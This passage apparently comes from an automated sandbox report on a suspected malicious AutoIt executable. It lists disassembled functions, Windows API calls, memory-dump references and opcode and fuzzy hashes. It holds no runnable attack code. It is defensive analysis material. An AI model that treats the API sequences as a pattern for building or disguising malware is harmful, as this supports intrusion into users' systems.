                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: CALL
                                                                                                                        • API String ID: 1385522511-4196123274
                                                                                                                        • Opcode ID: 596232a75ffe833d8a43e8daafd8e06d3e7f6006f2ffa7dda6b0ede61bdd494d
                                                                                                                        • Instruction ID: 6634c6f1f2c92b9a7d328588e81a4e2057efe7602474ce4a2ff8a8cee2b1219c
                                                                                                                        • Opcode Fuzzy Hash: 596232a75ffe833d8a43e8daafd8e06d3e7f6006f2ffa7dda6b0ede61bdd494d
                                                                                                                        • Instruction Fuzzy Hash: 9422AB706086529FC714DF14E484A2BBFF1BFA6314F18896DF4868B3A2D731E845CB86
                                                                                                                        Function 00586EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00586F6B
                                                                                                                          • Part of subcall function 00514ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EFD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad_wcslen
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                        • API String ID: 3312870042-2806939583
                                                                                                                        • Opcode ID: cce5a9ca205801be6ddf99b3a8ba7b3bfb85fe1f584399604276d7c3fb1578ae
                                                                                                                        • Instruction ID: 741b6fd0abcc939fdf08f7ab529197b2810baf9b9adafbbfbf9ac3598e5f8555
                                                                                                                        • Opcode Fuzzy Hash: cce5a9ca205801be6ddf99b3a8ba7b3bfb85fe1f584399604276d7c3fb1578ae
                                                                                                                        • Instruction Fuzzy Hash: 44B174312082069FDB14FF24C4959AEBBE5BFD8310F14495DF89697261EB30ED85CB92
                                                                                                                        Function 00582557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 2638373210-3962188686
                                                                                                                        • Opcode ID: 6d29b7636bec79ad49dde295ce26d1aa55787e4b417f627ad374aa78ca1a67ff
                                                                                                                        • Instruction ID: 89241343d2bcf0af205bc30084046dbc01c5d46a47e02f79d006108566054ae9
                                                                                                                        • Opcode Fuzzy Hash: 6d29b7636bec79ad49dde295ce26d1aa55787e4b417f627ad374aa78ca1a67ff
                                                                                                                        • Instruction Fuzzy Hash: 8301B5729442587EDF28D7A8C85AFAEBFF8AB05301F00455AE592E61C1E5B4E608CB60
                                                                                                                        Function 0171F850 Relevance: 1.7, APIs: 1, Instructions: 181COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0171F0C0: GetFileAttributesW.KERNELBASE(?), ref: 0171F0CB
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0171F9EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesCreateDirectoryFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3401506121-0
                                                                                                                        • Opcode ID: e83de68ac299bb71bcbab0c0780beb7698449ad80fb75449cfd5c59fc4997c61
                                                                                                                        • Instruction ID: 9703def226678fc07049de7979405a65e09ca97c6df80162cebca80e939b8b01
                                                                                                                        • Opcode Fuzzy Hash: e83de68ac299bb71bcbab0c0780beb7698449ad80fb75449cfd5c59fc4997c61
                                                                                                                        • Instruction Fuzzy Hash: 46619531A1120897EF14DFB4D844BEEB33AEF58300F109569E60DEB294EB799B48C765
                                                                                                                        Function 0052FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction ID: 99abc67ec20f9200d5920452b717e39ac1dbb84cd81301deb06dfaf919a41a39
                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction Fuzzy Hash: C631DF74A041199BD718CF59F490969FBB2FF4A300B2486B5E80ADB696D731EDC1CBD0
                                                                                                                        Function 00514ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00514E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E9C
                                                                                                                          • Part of subcall function 00514E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514EAE
                                                                                                                          • Part of subcall function 00514E90: FreeLibrary.KERNEL32(00000000,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EC0
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EFD
                                                                                                                          • Part of subcall function 00514E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E62
                                                                                                                          • Part of subcall function 00514E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514E74
                                                                                                                          • Part of subcall function 00514E59: FreeLibrary.KERNEL32(00000000,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E87
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2632591731-0
                                                                                                                        • Opcode ID: aba37786fd1f36d02c8dc402f9276e970527090c239eb07310ece650d43ae584
                                                                                                                        • Instruction ID: 48b0312ac32c550c80d4d31d0f05ca6639ee46fab9d83a75a2a14cdf16941df8
                                                                                                                        • Opcode Fuzzy Hash: aba37786fd1f36d02c8dc402f9276e970527090c239eb07310ece650d43ae584
                                                                                                                        • Instruction Fuzzy Hash: 7111C431600206AAEF15AB60D81AFED7FA5BFC0711F10442AF542AA2D1EE719E85DB50
                                                                                                                        Function 00548402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wsopen_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3347428461-0
                                                                                                                        • Opcode ID: 9d59626c12810cbc246622456b8a193d956298b931b56eeeb23c261f8471b7f1
                                                                                                                        • Instruction ID: 618b61f8fe42da43e59964d0c08dde0c02aa4591aef5de213732375e3dde6d57
                                                                                                                        • Opcode Fuzzy Hash: 9d59626c12810cbc246622456b8a193d956298b931b56eeeb23c261f8471b7f1
                                                                                                                        • Instruction Fuzzy Hash: 5311257590410AAFCF09DF58E9449EE7BF8FF48308F144059F808AB352DA30DA118BA4
                                                                                                                        Function 00545000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00544C7D: RtlAllocateHeap.NTDLL(00000008,00511129,00000000,?,00542E29,00000001,00000364,?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?), ref: 00544CBE
                                                                                                                        • _free.LIBCMT ref: 0054506C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                        • Instruction ID: faf7293bcd45e29fdd4cd395ffc8697be0ccd866822b4e37b3ecc14e7bffd585
                                                                                                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                        • Instruction Fuzzy Hash: 090126762047056BE3218E659889ADAFFE9FB89374F65051DE18883281EA30A805C6B4
                                                                                                                        Function 0053E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                        • Instruction ID: 6c5e10eb16971aa7c5077b82ff950d0662c1c295916054eef83bed6e1020f663
                                                                                                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                        • Instruction Fuzzy Hash: 57F02D32510A1597D7313A65AC0FB9B3FE8BFD2339F100719F424931D1CB70D80186A5
                                                                                                                        Function 00544C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00511129,00000000,?,00542E29,00000001,00000364,?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?), ref: 00544CBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: b9e1522ed38326f20b62199e8f248f0d4790d6e57c2baea3e7d318970a886a16
                                                                                                                        • Instruction ID: 4659401197991350d627ea968523f16c841bb239aadb1ac43c86834c658446de
                                                                                                                        • Opcode Fuzzy Hash: b9e1522ed38326f20b62199e8f248f0d4790d6e57c2baea3e7d318970a886a16
                                                                                                                        • Instruction Fuzzy Hash: 52F0E93168222567DB215F72AC8DBDB3F98BF917A9F1C4121BC15AA281CA30DC009EE0
                                                                                                                        Function 00543820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 1fc77640f5bb0d2085960ab3dbfc0d280e7bce6a13504e8330d23459534c25dc
                                                                                                                        • Instruction ID: 2f5f05b9be6bcdeb8d9d0c5cea27efbf4dca003c3cd192af6aa530af4a067f40
                                                                                                                        • Opcode Fuzzy Hash: 1fc77640f5bb0d2085960ab3dbfc0d280e7bce6a13504e8330d23459534c25dc
                                                                                                                        • Instruction Fuzzy Hash: F9E02B3110322596D7312A779C04BDBBF49BF927B8F050030BC14965B0DB21ED019AE1
                                                                                                                        Function 00514F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514F6D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: 5241ec33e3ed82c3b07d9b72859507fc65ff1a261b66233116e9e32668ce8d68
                                                                                                                        • Instruction ID: 2c9151721821c03295ce8f418c1f18d359c46c982612447c3d2c6a9ce3916412
                                                                                                                        • Opcode Fuzzy Hash: 5241ec33e3ed82c3b07d9b72859507fc65ff1a261b66233116e9e32668ce8d68
                                                                                                                        • Instruction Fuzzy Hash: B4F01571105792CFEB349F64E4948A2BFE4BF15329324997EE1EA86721C7319889DF10
                                                                                                                        Function 00512DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00512DC4
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541455249-0
                                                                                                                        • Opcode ID: 1caff749c3c295e75cceea02674f4a6ab957183f92078c586c7744f08f545cca
                                                                                                                        • Instruction ID: af6bb60d88b20b4a14c9e3f61be18ee2463dd605261ee7774c41c0eb110563f5
                                                                                                                        • Opcode Fuzzy Hash: 1caff749c3c295e75cceea02674f4a6ab957183f92078c586c7744f08f545cca
                                                                                                                        • Instruction Fuzzy Hash: B9E0CD766041245BC71092589C09FEA7BDDEFC8790F050071FD09D7248DA60AD848550
                                                                                                                        Function 00582693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2638373210-0
                                                                                                                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                        • Instruction ID: 4af60ae06e8a28e03a92370fb77e0dabebe6cbf16edd06e3fed704e15c7571f9
                                                                                                                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                        • Instruction Fuzzy Hash: D8E048B06097005FDF396A28A8517B6BBD4AF49300F10045EF59F92252E5726845874D
                                                                                                                        Function 00512B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00513908
                                                                                                                          • Part of subcall function 0051D730: GetInputState.USER32 ref: 0051D807
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00512B6B
                                                                                                                          • Part of subcall function 005130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0051314E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3667716007-0
                                                                                                                        • Opcode ID: de095e054a15b48a2d6c0faef4dbe459d926b0fff45b7e8c14b353759a33b607
                                                                                                                        • Instruction ID: 9e774b8ef3a567c51a5a47a9b086c4ec7cdf331ecb298829a5f51daef80eac61
                                                                                                                        • Opcode Fuzzy Hash: de095e054a15b48a2d6c0faef4dbe459d926b0fff45b7e8c14b353759a33b607
                                                                                                                        • Instruction Fuzzy Hash: D3E0863130424617EB08BB75A86A5EDBF99BBE5351F40153EF182472A2CF658AC98352
                                                                                                                        Function 0171F0C0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0171F0CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                        • Instruction ID: 0e0b66fe58abec8380d317e0f0da843625b8ea1eda86a0ba72f8fc9e6d5af9ba
                                                                                                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                        • Instruction Fuzzy Hash: 1DE0C230A0560CEBDB20CBBCCC04BAEB3A8D708320F00C795E906D32C1DA32CA48D714
                                                                                                                        Function 0055039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00550704,?,?,00000000,?,00550704,00000000,0000000C), ref: 005503B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
